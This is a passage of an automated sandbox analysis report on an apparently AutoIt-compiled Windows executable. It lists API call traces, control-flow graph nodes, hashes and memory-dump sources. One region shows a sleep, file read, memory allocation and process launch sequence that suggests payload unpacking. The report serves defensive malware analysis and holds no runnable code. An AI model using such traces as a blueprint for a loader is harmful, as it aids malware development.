                                                                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                            • API String ID: 2914291525-1005189915
                                                                                                            • Opcode ID: a5525af24dba7483e02bd5c9d2a3efd381b26ad604692263adacf60a95dcaafe
                                                                                                            • Instruction ID: 20ac02da62b8f9c4bbf37f3a60f957d2afa1cd43264c75e96c33516da759ae25
                                                                                                            • Opcode Fuzzy Hash: a5525af24dba7483e02bd5c9d2a3efd381b26ad604692263adacf60a95dcaafe
                                                                                                            • Instruction Fuzzy Hash: 1021E4B1911348AFDB10EFA5E889B9DBBB4FB08700F10515AF511FA3A0D7B10646CFA1

                                                                                                            Control-flow Graph

                                                                                                            control_flow_graph 302 d9065b-d9068b call d9042f 305 d9068d-d90698 call d7f2c6 302->305 306 d906a6-d906b2 call d85221 302->306 311 d9069a-d906a1 call d7f2d9 305->311 312 d906cb-d90714 call d9039a 306->312 313 d906b4-d906c9 call d7f2c6 call d7f2d9 306->313 323 d9097d-d90983 311->323 321 d90781-d9078a GetFileType 312->321 322 d90716-d9071f 312->322 313->311 327 d9078c-d907bd GetLastError call d7f2a3 CloseHandle 321->327 328 d907d3-d907d6 321->328 325 d90721-d90725 322->325 326 d90756-d9077c GetLastError call d7f2a3 322->326 325->326 332 d90727-d90754 call d9039a 325->332 326->311 327->311 339 d907c3-d907ce call d7f2d9 327->339 330 d907d8-d907dd 328->330 331 d907df-d907e5 328->331 335 d907e9-d90837 call d8516a 330->335 331->335 336 d907e7 331->336 332->321 332->326 345 d90839-d90845 call d905ab 335->345 346 d90847-d9086b call d9014d 335->346 336->335 339->311 345->346 353 d9086f-d90879 call d886ae 345->353 351 d9086d 346->351 352 d9087e-d908c1 346->352 351->353 355 d908c3-d908c7 352->355 356 d908e2-d908f0 352->356 353->323 355->356 358 d908c9-d908dd 355->358 359 d9097b 356->359 360 d908f6-d908fa 356->360 358->356 359->323 360->359 361 d908fc-d9092f CloseHandle call d9039a 360->361 364 d90931-d9095d GetLastError call d7f2a3 call d85333 361->364 365 d90963-d90977 361->365 364->365 365->359
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D9039A: CreateFileW.KERNELBASE(00000000,00000000,?,00D90704,?,?,00000000,?,00D90704,00000000,0000000C), ref: 00D903B7
                                                                                                            • GetLastError.KERNEL32 ref: 00D9076F
                                                                                                            • __dosmaperr.LIBCMT ref: 00D90776
                                                                                                            • GetFileType.KERNELBASE(00000000), ref: 00D90782
                                                                                                            • GetLastError.KERNEL32 ref: 00D9078C
                                                                                                            • __dosmaperr.LIBCMT ref: 00D90795
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00D907B5
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00D908FF
                                                                                                            • GetLastError.KERNEL32 ref: 00D90931
                                                                                                            • __dosmaperr.LIBCMT ref: 00D90938
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                            • String ID: H
                                                                                                            • API String ID: 4237864984-2852464175
                                                                                                            • Opcode ID: 3d03c06b991e806b85997279e62702ab0af8892792a83a4b75fb50ed2ce1cd11
                                                                                                            • Instruction ID: 7773c06a441558f8d5c3ed7687005594be093c059b0c80e8136104c2a2d3b3d3
                                                                                                            • Opcode Fuzzy Hash: 3d03c06b991e806b85997279e62702ab0af8892792a83a4b75fb50ed2ce1cd11
                                                                                                            • Instruction Fuzzy Hash: 25A11632A141049FDF29AF68E851BAD7FA1EB06320F184159F815EB3D2D7319817CBB1

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                              • Part of subcall function 00D53A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00E21418,?,00D52E7F,?,?,?,00000000), ref: 00D53A78
                                                                                                              • Part of subcall function 00D53357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00D53379
                                                                                                            • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00D5356A
                                                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00D9318D
                                                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00D931CE
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00D93210
                                                                                                            • _wcslen.LIBCMT ref: 00D93277
                                                                                                            • _wcslen.LIBCMT ref: 00D93286
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                                            • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                            • API String ID: 98802146-2727554177
                                                                                                            • Opcode ID: a4eec9894bdcc61aba92cbd6ae97c014b797a2fed54505f72b8de9be749e3ef0
                                                                                                            • Instruction ID: ead3a558c654f5e30b565be1dbcf6671896bd4dd2e9dfbca57e2d9c2886bf8ea
                                                                                                            • Opcode Fuzzy Hash: a4eec9894bdcc61aba92cbd6ae97c014b797a2fed54505f72b8de9be749e3ef0
                                                                                                            • Instruction Fuzzy Hash: 7E717271404302AEC724EF6AEC8196BBBE8FF95350F40452DFA45A7161EB309A4DCB72

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00D52B8E
                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00D52B9D
                                                                                                            • LoadIconW.USER32(00000063), ref: 00D52BB3
                                                                                                            • LoadIconW.USER32(000000A4), ref: 00D52BC5
                                                                                                            • LoadIconW.USER32(000000A2), ref: 00D52BD7
                                                                                                            • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00D52BEF
                                                                                                            • RegisterClassExW.USER32(?), ref: 00D52C40
                                                                                                              • Part of subcall function 00D52CD4: GetSysColorBrush.USER32(0000000F), ref: 00D52D07
                                                                                                              • Part of subcall function 00D52CD4: RegisterClassExW.USER32(00000030), ref: 00D52D31
                                                                                                              • Part of subcall function 00D52CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00D52D42
                                                                                                              • Part of subcall function 00D52CD4: InitCommonControlsEx.COMCTL32(?), ref: 00D52D5F
                                                                                                              • Part of subcall function 00D52CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00D52D6F
                                                                                                              • Part of subcall function 00D52CD4: LoadIconW.USER32(000000A9), ref: 00D52D85
                                                                                                              • Part of subcall function 00D52CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00D52D94
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                            • String ID: #$0$AutoIt v3
                                                                                                            • API String ID: 423443420-4155596026

                                                                                                             Control-flow Graph (graph data omitted)

                                                                                                            APIs
                                                                                                            • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00D5316A,?,?), ref: 00D531D8
                                                                                                            • KillTimer.USER32(?,00000001,?,?,?,?,?,00D5316A,?,?), ref: 00D53204
                                                                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00D53227
                                                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00D5316A,?,?), ref: 00D53232
                                                                                                            • CreatePopupMenu.USER32 ref: 00D53246
                                                                                                            • PostQuitMessage.USER32(00000000), ref: 00D53267
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                            • String ID: TaskbarCreated
                                                                                                            • API String ID: 129472671-2362178303
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: D%$D%$D%$D%$D%$Variable must be of type 'Object'.
                                                                                                            • API String ID: 0-2799515523

                                                                                                             Control-flow Graph (graph data omitted)

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd

                                                                                                             Control-flow Graph (graph data omitted)

                                                                                                            APIs
                                                                                                            • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 015D6695
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1734196376.00000000015D5000.00000040.00000020.00020000.00000000.sdmp, Offset: 015D5000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_15d5000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 823142352-0

                                                                                                             Control-flow Graph (graph data omitted)

                                                                                                            APIs
                                                                                                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00D52C91
                                                                                                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00D52CB2
                                                                                                            • ShowWindow.USER32(00000000,?,?,?,?,?,?,00D51CAD,?), ref: 00D52CC6
                                                                                                            • ShowWindow.USER32(00000000,?,?,?,?,?,?,00D51CAD,?), ref: 00D52CCF
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$CreateShow
                                                                                                            • String ID: AutoIt v3$edit
                                                                                                            • API String ID: 1584632944-3779509399

                                                                                                             Control-flow Graph (graph data omitted)

                                                                                                            APIs
                                                                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00DC2C05
                                                                                                            • DeleteFileW.KERNEL32(?), ref: 00DC2C87
                                                                                                            • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00DC2C9D
                                                                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00DC2CAE
                                                                                                            • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00DC2CC0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$Delete$Copy
                                                                                                            • String ID:
                                                                                                            • API String ID: 3226157194-0

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1378 15d80e0-15d8231 call 15d5d30 call 15d7fd0 CreateFileW 1385 15d8238-15d8248 1378->1385 1386 15d8233 1378->1386 1389 15d824f-15d8269 VirtualAlloc 1385->1389 1390 15d824a 1385->1390 1387 15d8305-15d830a 1386->1387 1391 15d826b 1389->1391 1392 15d8270-15d8287 ReadFile 1389->1392 1390->1387 1391->1387 1393 15d8289 1392->1393 1394 15d828b-15d82a0 call 15d6da0 1392->1394 1393->1387 1396 15d82a5-15d82df call 15d8010 call 15d6fd0 1394->1396 1401 15d82fb-15d8303 1396->1401 1402 15d82e1-15d82f6 call 15d8060 1396->1402 1401->1387 1402->1401
APIs
  • Part of subcall function 015D7FD0: Sleep.KERNELBASE(000001F4), ref: 015D7FE1
• CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 015D8227
Strings
Memory Dump Source
• Source File: 00000000.00000002.1734196376.00000000015D5000.00000040.00000020.00020000.00000000.sdmp, Offset: 015D5000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15d5000_AHSlIDftf1.jbxd
Similarity
• API ID: CreateFileSleep
• String ID: 49ZD3PGV7O3AI611SQ732TE5SZZLP0
• API String ID: 2694422964-1987587173
APIs
• RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00D53B0F,SwapMouseButtons,00000004,?), ref: 00D53B40
• RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00D53B0F,SwapMouseButtons,00000004,?), ref: 00D53B61
• RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00D53B0F,SwapMouseButtons,00000004,?), ref: 00D53B83
Strings
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID: Control Panel\Mouse
• API String ID: 3677997916-824357125
APIs
• LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00D933A2
  • Part of subcall function 00D56B57: _wcslen.LIBCMT ref: 00D56B6A
• Shell_NotifyIconW.SHELL32(00000001,?), ref: 00D53A04
Strings
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
Similarity
• API ID: IconLoadNotifyShell_String_wcslen
• String ID: Line:
• API String ID: 2289894680-1585850449
APIs
• GetOpenFileNameW.COMDLG32(?), ref: 00D92C8C
  • Part of subcall function 00D53AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D53A97,?,?,00D52E7F,?,?,?,00000000), ref: 00D53AC2
  • Part of subcall function 00D52DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00D52DC4
Strings
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
Similarity
• API ID: Name$Path$FileFullLongOpen
• String ID: X$`e
• API String ID: 779396738-4036142377
APIs
• __CxxThrowException@8.LIBVCRUNTIME ref: 00D70668
  • Part of subcall function 00D732A4: RaiseException.KERNEL32(?,?,?,00D7068A,?,00E21444,?,?,?,?,?,?,00D7068A,00D51129,00E18738,00D51129), ref: 00D73304
• __CxxThrowException@8.LIBVCRUNTIME ref: 00D70685
Strings
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
Similarity
• API ID: Exception@8Throw$ExceptionRaise
• String ID: Unknown exception
• API String ID: 3476068407-410509341
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 015D6D75
• ExitProcess.KERNEL32(00000000), ref: 015D6D94
Strings
Memory Dump Source
• Source File: 00000000.00000002.1734196376.00000000015D5000.00000040.00000020.00020000.00000000.sdmp, Offset: 015D5000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15d5000_AHSlIDftf1.jbxd
Similarity
• API ID: Process$CreateExit
• String ID: D
• API String ID: 126409537-2746444292
APIs
• GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00DC302F
• GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00DC3044
Strings
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
Similarity
• API ID: Temp$FileNamePath
• String ID: aut
• API String ID: 3285503233-3010740371
APIs
• GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00DD82F5
• TerminateProcess.KERNEL32(00000000), ref: 00DD82FC
• FreeLibrary.KERNEL32(?,?,?,?), ref: 00DD84DD
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
Similarity
• API ID: Process$CurrentFreeLibraryTerminate
• String ID:
• API String ID: 146820519-0
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7a8811b7a58717764bf40931b834908147c8c287f9d05fefd9c9f666f5dc0a6d
                                                                                                            • Instruction ID: 5eff3a55d355078509554151c9faadcc1fb424d58b02244d40e3e85e73745f2c
                                                                                                            • Opcode Fuzzy Hash: 7a8811b7a58717764bf40931b834908147c8c287f9d05fefd9c9f666f5dc0a6d
                                                                                                            • Instruction Fuzzy Hash: 75519E75E00609AFDB21BFA9E945FEEBBB8EF15310F18005AF405A7296D7319A01CB71
APIs
  • Part of subcall function 00D51BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00D51BF4
  • Part of subcall function 00D51BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00D51BFC
  • Part of subcall function 00D51BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00D51C07
  • Part of subcall function 00D51BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00D51C12
  • Part of subcall function 00D51BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00D51C1A
  • Part of subcall function 00D51BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00D51C22
  • Part of subcall function 00D51B4A: RegisterWindowMessageW.USER32(00000004,?,00D512C4), ref: 00D51BA2
• GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00D5136A
• OleInitialize.OLE32 ref: 00D51388
• CloseHandle.KERNEL32(00000000,00000000), ref: 00D924AB
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
Similarity
• API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
• String ID:
• API String ID: 1986988660-0
• Opcode ID: 14865e2dc82d3be4af5e2d59016c3a1f75a6cb857f2eba76256fa8572801c961
• Instruction ID: 6452d037f163ff5c0500c15fd269afc05e407e40a53c24a59f79952faa129853
• Opcode Fuzzy Hash: 14865e2dc82d3be4af5e2d59016c3a1f75a6cb857f2eba76256fa8572801c961
• Instruction Fuzzy Hash: 1571CEB49513548EC7A8EF7BAC816543BE0FBA834135452FAD81AE7361EB30460BCF61
APIs
  • Part of subcall function 00D53923: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00D53A04
• Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00DBC259
• KillTimer.USER32(?,00000001,?,?), ref: 00DBC261
• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00DBC270
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
Similarity
• API ID: IconNotifyShell_Timer$Kill
• String ID:
• API String ID: 3500052701-0
• Opcode ID: 9a120a88b9b73ee63daec67b009c0d961dea43a4931b400946f465c8844a9c54
• Instruction ID: 31fe3cdf87f5b5fb811ec7575d2209cff45a688f473c9bb0e1c604c4df41107b
• Opcode Fuzzy Hash: 9a120a88b9b73ee63daec67b009c0d961dea43a4931b400946f465c8844a9c54
• Instruction Fuzzy Hash: 9431C370914384EFEB32DF648895BE7BBECAB06308F04149ED5DAA7241C3745A89CB65
APIs
• CloseHandle.KERNELBASE(00000000,00000000,?,?,00D885CC,?,00E18CC8,0000000C), ref: 00D88704
• GetLastError.KERNEL32(?,00D885CC,?,00E18CC8,0000000C), ref: 00D8870E
• __dosmaperr.LIBCMT ref: 00D88739
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
Similarity
• API ID: CloseErrorHandleLast__dosmaperr
• String ID:
• API String ID: 2583163307-0
• Opcode ID: 37667cb66a4122699a44e9e0195eab9e589df32c46f11adaf9d487a6c92f5145
• Instruction ID: 24977514ed44cba389bb692f5ae088b289fdc2ec480d775e21386cee2ffa3260
• Opcode Fuzzy Hash: 37667cb66a4122699a44e9e0195eab9e589df32c46f11adaf9d487a6c92f5145
• Instruction Fuzzy Hash: 4C012636A056603AD6357334B846B7E67598B82774F7D0119F818DB1D3EEA1DC82A3B0
APIs
• TranslateMessage.USER32(?), ref: 00D5DB7B
• DispatchMessageW.USER32(?), ref: 00D5DB89
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D5DB9F
• Sleep.KERNEL32(0000000A), ref: 00D5DBB1
• TranslateAcceleratorW.USER32(?,?,?), ref: 00DA1CC9
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
